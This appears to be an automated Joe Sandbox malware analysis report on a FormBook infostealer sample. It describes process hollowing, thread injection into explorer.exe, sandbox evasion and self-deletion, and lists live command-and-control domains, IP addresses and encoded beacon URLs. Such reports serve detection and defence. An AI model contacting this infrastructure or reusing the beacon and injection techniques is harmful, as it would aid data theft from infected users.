          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing11DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 510401 Sample: CtTYTpaAKA.exe Startdate: 27/10/2021 Architecture: WINDOWS Score: 100 31 www.qywyfeo8.xyz 2->31 33 www.mask60.com 2->33 35 mask60.com 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 7 other signatures 2->49 11 CtTYTpaAKA.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\CtTYTpaAKA.exe.log, ASCII 11->29 dropped 61 Tries to detect virtualization through RDTSC time measurements 11->61 15 CtTYTpaAKA.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.rdoi.top 104.233.161.241, 49786, 80 PEGTECHINCUS United States 18->37 39 www.sosoon.store 18.118.119.183, 49811, 80 MIT-GATEWAYSUS United States 18->39 41 11 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 cscript.exe 18->22         started        signatures11 process12 signatures13 53 Self deletion via cmd delete 22->53 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          CtTYTpaAKA.exe13%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.0.CtTYTpaAKA.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.CtTYTpaAKA.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.CtTYTpaAKA.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.CtTYTpaAKA.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          megacinema.club0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.isshinn1.com/fqiq/?7ntl=P0DdOFE&t4=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8bI2AJlImQfa0%Avira URL Cloudsafe
          http://www.thedusi.com/fqiq/?7ntl=P0DdOFE&t4=t9SsZ/MS+FgAljVT/evJl5FFrjjg4DD8GLJQPa9p2h0JK2Hk2yZve+gJxH10C5UF88V/0%Avira URL Cloudsafe
          www.esyscoloradosprings.com/fqiq/0%Avira URL Cloudsafe
          http://www.passiverewardssystems.com/fqiq/?t4=S7zufRYckdaRFFMeU2i8sPw6oODMRAGo5BePfs9LVZnwdcptwuHxEcdCnQUJ/1YT2L5I&7ntl=P0DdOFE0%Avira URL Cloudsafe
          http://www.megacinema.club/fqiq/?7ntl=P0DdOFE&t4=VbjQ+CrtVqSc6MjyqwiIrbcVi4OLgBoaswazXZOO5Xcx+UM7PWGlfM9NMvQxrE1YfGIg0%Avira URL Cloudsafe
          http://www.24000words.com/fqiq/?t4=iMQAtVYJ5rSxYH2x6+rXrM9PD6xR/OhOVeuwgCEnac3/UPHz+dInplYvIFxL5JBy9ykq&7ntl=P0DdOFE0%Avira URL Cloudsafe
          http://www.rdoi.top/fqiq/?t4=DrMAfIISwi8U79fOFtAc8vb7WUYlKccaGhxOihVWZlb0OyUiTIjpechuj+pZJYn+REB0&7ntl=P0DdOFE0%Avira URL Cloudsafe
          http://www.sosoon.store/fqiq/?7ntl=P0DdOFE&t4=37G2EJO5ajdFCPilMv01MVSoTtyG1cwu/oJiLg0B75A/3Z+IhDAr8cszuRbw5Svr7Hw70%Avira URL Cloudsafe
          http://www.healthyweekendtips.com/fqiq/?7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+0%Avira URL Cloudsafe
          http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
          http://www.esyscoloradosprings.com/fqiq/?t4=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&7ntl=P0DdOFE0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.passiverewardssystems.com
          		203.170.80.253
          		truetrue
            		unknown
            www.rdoi.top
            		104.233.161.241
            		truetrue
              		unknown
              megacinema.club
              		45.93.101.51
              		truetrueunknown
              www.isshinn1.com
              		157.7.107.193
              		truetrue
                		unknown
                www.sosoon.store
                		18.118.119.183
                		truetrue
                  		unknown
                  www.24000words.com
                  		156.240.150.22
                  		truetrue
                    		unknown
                    thedusi.com
                    		34.102.136.180
                    		truefalse
                      		unknown
                      www.healthyweekendtips.com
                      		172.67.216.2
                      		truetrue
                        		unknown
                        mask60.com
                        		116.212.126.191
                        		truetrue
                          		unknown
                          websites076.homestead.com
                          		108.167.135.122
                          		truefalse
                            		high
                            www.esyscoloradosprings.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.mask60.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.qywyfeo8.xyz
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.megacinema.club
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.creationslazzaroni.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.thedusi.com
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.isshinn1.com/fqiq/?7ntl=P0DdOFE&t4=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8bI2AJlImQfatrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.thedusi.com/fqiq/?7ntl=P0DdOFE&t4=t9SsZ/MS+FgAljVT/evJl5FFrjjg4DD8GLJQPa9p2h0JK2Hk2yZve+gJxH10C5UF88V/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        www.esyscoloradosprings.com/fqiq/true
                                        • Avira URL Cloud: safe
                                        		low
                                        http://www.passiverewardssystems.com/fqiq/?t4=S7zufRYckdaRFFMeU2i8sPw6oODMRAGo5BePfs9LVZnwdcptwuHxEcdCnQUJ/1YT2L5I&7ntl=P0DdOFEtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.megacinema.club/fqiq/?7ntl=P0DdOFE&t4=VbjQ+CrtVqSc6MjyqwiIrbcVi4OLgBoaswazXZOO5Xcx+UM7PWGlfM9NMvQxrE1YfGIgtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.24000words.com/fqiq/?t4=iMQAtVYJ5rSxYH2x6+rXrM9PD6xR/OhOVeuwgCEnac3/UPHz+dInplYvIFxL5JBy9ykq&7ntl=P0DdOFEtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.rdoi.top/fqiq/?t4=DrMAfIISwi8U79fOFtAc8vb7WUYlKccaGhxOihVWZlb0OyUiTIjpechuj+pZJYn+REB0&7ntl=P0DdOFEtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.sosoon.store/fqiq/?7ntl=P0DdOFE&t4=37G2EJO5ajdFCPilMv01MVSoTtyG1cwu/oJiLg0B75A/3Z+IhDAr8cszuRbw5Svr7Hw7true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.healthyweekendtips.com/fqiq/?7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.esyscoloradosprings.com/fqiq/?t4=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&7ntl=P0DdOFEtrue
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.csscscript.exe, 0000000A.00000002.560650988.0000000004DC2000.00000004.00020000.sdmpfalse
                                          		high
                                          http://www.collada.org/2005/11/COLLADASchema9DoneCtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://pepabo.com/cscript.exe, 0000000A.00000002.560650988.0000000004DC2000.00000004.00020000.sdmpfalse
                                            		high

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            157.7.107.193
                                            		www.isshinn1.comJapan7506INTERQGMOInternetIncJPtrue
                                            172.67.216.2
                                            		www.healthyweekendtips.comUnited States
                                            		13335CLOUDFLARENETUStrue
                                            108.167.135.122
                                            		websites076.homestead.comUnited States
                                            		46606UNIFIEDLAYER-AS-1USfalse
                                            203.170.80.253
                                            		www.passiverewardssystems.comAustralia
                                            		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                                            156.240.150.22
                                            		www.24000words.comSeychelles
                                            		328608Africa-on-Cloud-ASZAtrue
                                            18.118.119.183
                                            		www.sosoon.storeUnited States
                                            		3MIT-GATEWAYSUStrue
                                            34.102.136.180
                                            		thedusi.comUnited States
                                            		15169GOOGLEUSfalse
                                            104.233.161.241
                                            		www.rdoi.topUnited States
                                            		54600PEGTECHINCUStrue
                                            45.93.101.51
                                            		megacinema.clubGermany
                                            		40065CNSERVERSUStrue

                                            General Information

                                            Joe Sandbox Version:33.0.0 White Diamond
                                            Analysis ID:510401
                                            Start date:27.10.2021
                                            Start time:19:12:07
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 10m 40s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:CtTYTpaAKA.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:23
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/1@12/9
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 10.8% (good quality ratio 9.6%)
                                            • Quality average: 72.4%
                                            • Quality standard deviation: 32.2%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 80
                                            • Number of non-executed functions: 149
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                            • Excluded IPs from analysis (whitelisted): 20.50.102.62, 20.54.110.249, 40.91.112.76, 40.112.88.60, 80.67.82.235, 80.67.82.242
                                            • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                            • Not all processes where analyzed, report is missing behavior information

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            19:13:02API Interceptor2x Sleep call for process: CtTYTpaAKA.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            157.7.107.193sLtLgOtoPA.exeGet hashmaliciousBrowse
                                            • www.isshinn1.com/fqiq/?Pbu=IbAhXpax&i48l=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8YomPo1w412d
                                            172.67.216.22u2u8wnrrW.exeGet hashmaliciousBrowse
                                            • www.healthyweekendtips.com/fqiq/?M8sli0XH=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDFtlKJiid6rvTcStxw==&eL3dh=5jNDd4kX
                                            108.167.135.122vx55dc0wIv.exeGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?mJEhrX=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PSHA2k2y9Lk&s2JD=cFNDC4_po
                                            CONTRACT 18639.xlsxGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?9ru=0nUtrL7PKd04iT&dVuxZRHH=KZhYdxsFX4Cy5huCrksKfhNe7DL7yKRLCyuZj4rSbKSeqpNQJyJA+bfY/q+7bWQF98eUdg==
                                            CONTRACT 18641.xlsxGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?1bft=KZhYdxsFX4Cy5huCrksKfhNe7DL7yKRLCyuZj4rSbKSeqpNQJyJA+bfY/q+7bWQF98eUdg==&m6Gd=YR-dILR0AVm
                                            DMS210949 MV LYDERHORN LOW MIX RATIO.xlsxGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?c0=KZhYdxsFX4Cy5huCrksKfhNe7DL7yKRLCyuZj4rSbKSeqpNQJyJA+bfY/q+7bWQF98eUdg==&c2MXRn=tzuHZ0-p5d904
                                            PI Alu Circle_Dt. 14.05.2021.xlsxGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?m0=KZhYdxsFX4Cy5huCrksKfhNe7DL7yKRLCyuZj4rSbKSeqpNQJyJA+bfY/q+7bWQF98eUdg==&Z0G8=jhqLW0YxgjI
                                            XCFqu9rd3Q.exeGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?9r=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&lxoxn=-Z44Jj
                                            mkjnI5hbhI.exeGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?aJBX0=PzuD_l&IN643ZF0=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PSHA2k2y9Lk
                                            T7huuSvQv4.exeGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?T48d=f2MHm2U&Y6Upd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PSHA2k2y9Lk
                                            ZHANGZHOU YIHANSHENG HOUSEWARES.xlsxGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?AV38jb=KZhYdxsFX4Cy5huCrksKfhNe7DL7yKRLCyuZj4rSbKSeqpNQJyJA+bfY/q+7bWQF98eUdg==&exoP_6=9raXztspjfNlRrw0
                                            CXVlBV2Bya.exeGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?f0GxZ=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&9rM=SL04qF
                                            sLtLgOtoPA.exeGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?i48l=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&Pbu=IbAhXpax
                                            2u2u8wnrrW.exeGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?eL3dh=5jNDd4kX&M8sli0XH=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8M+9D3INxKq1ETGrvw==
                                            divpCHa0h7.exeGet hashmaliciousBrowse
                                            • www.esyscoloradosprings.com/fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            www.rdoi.topCONTRACT 18639.xlsxGet hashmaliciousBrowse
                                            • 104.233.161.241
                                            PI Alu Circle_Dt. 14.05.2021.xlsxGet hashmaliciousBrowse
                                            • 104.233.161.241
                                            www.passiverewardssystems.comDMS210949 MV LYDERHORN LOW MIX RATIO.xlsxGet hashmaliciousBrowse
                                            • 203.170.80.253
                                            mkjnI5hbhI.exeGet hashmaliciousBrowse
                                            • 203.170.80.253
                                            ZHANGZHOU YIHANSHENG HOUSEWARES.xlsxGet hashmaliciousBrowse
                                            • 203.170.80.253
                                            CXVlBV2Bya.exeGet hashmaliciousBrowse
                                            • 203.170.80.253
                                            triage_dropped_file.exeGet hashmaliciousBrowse
                                            • 203.170.80.253
                                            www.isshinn1.comsLtLgOtoPA.exeGet hashmaliciousBrowse
                                            • 157.7.107.193
                                            www.healthyweekendtips.comT7huuSvQv4.exeGet hashmaliciousBrowse
                                            • 104.21.78.41
                                            2u2u8wnrrW.exeGet hashmaliciousBrowse
                                            • 172.67.216.2
                                            www.sosoon.storetzdVV2W5et.exeGet hashmaliciousBrowse
                                            • 18.118.119.183
                                            4OlVYrynpO.exeGet hashmaliciousBrowse
                                            • 18.118.119.183
                                            XCFqu9rd3Q.exeGet hashmaliciousBrowse
                                            • 18.118.119.183
                                            T7huuSvQv4.exeGet hashmaliciousBrowse
                                            • 51.81.185.94
                                            sLtLgOtoPA.exeGet hashmaliciousBrowse
                                            • 51.81.185.94
                                            www.24000words.com2u2u8wnrrW.exeGet hashmaliciousBrowse
                                            • 156.240.150.22
                                            bGOw6FuOUA.exeGet hashmaliciousBrowse
                                            • 156.240.150.22
                                            websites076.homestead.comvx55dc0wIv.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            CONTRACT 18639.xlsxGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            CONTRACT 18641.xlsxGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            DMS210949 MV LYDERHORN LOW MIX RATIO.xlsxGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            PI Alu Circle_Dt. 14.05.2021.xlsxGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            XCFqu9rd3Q.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            mkjnI5hbhI.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            T7huuSvQv4.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            ZHANGZHOU YIHANSHENG HOUSEWARES.xlsxGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            CXVlBV2Bya.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            sLtLgOtoPA.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            triage_dropped_file.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            PO 4910007391 CHANGZHOU.xlsxGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            t8MQow7sN9.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            2u2u8wnrrW.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            ClgNlmU3Is.exeGet hashmaliciousBrowse
                                            • 108.167.135.122
                                            divpCHa0h7.exeGet hashmaliciousBrowse
                                            • 108.167.135.122

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            INTERQGMOInternetIncJPSHIPPING DOCUMENT.xlsxGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            F9ObnUc4ol.exeGet hashmaliciousBrowse
                                            • 118.27.122.187
                                            DHL_119040 receipt document,pdf.exeGet hashmaliciousBrowse
                                            • 150.95.219.218
                                            n7gjtO4ZwD.exeGet hashmaliciousBrowse
                                            • 118.27.122.92
                                            F30AGnBthja6Ka2.exeGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            PFD33mzc5lGet hashmaliciousBrowse
                                            • 118.27.80.204
                                            comingback.exeGet hashmaliciousBrowse
                                            • 118.27.122.217
                                            MV ANACAPA LIGHT.xlsxGet hashmaliciousBrowse
                                            • 118.27.122.214
                                            cyberantix-PayroLL-997263-pdf.HtMLGet hashmaliciousBrowse
                                            • 150.95.219.148
                                            cyberantix-PayroLL-997263-pdf.HtMLGet hashmaliciousBrowse
                                            • 150.95.219.148
                                            8jfOcvTqQAGet hashmaliciousBrowse
                                            • 163.44.189.209
                                            IN7REq0Jv5Get hashmaliciousBrowse
                                            • 133.130.112.119
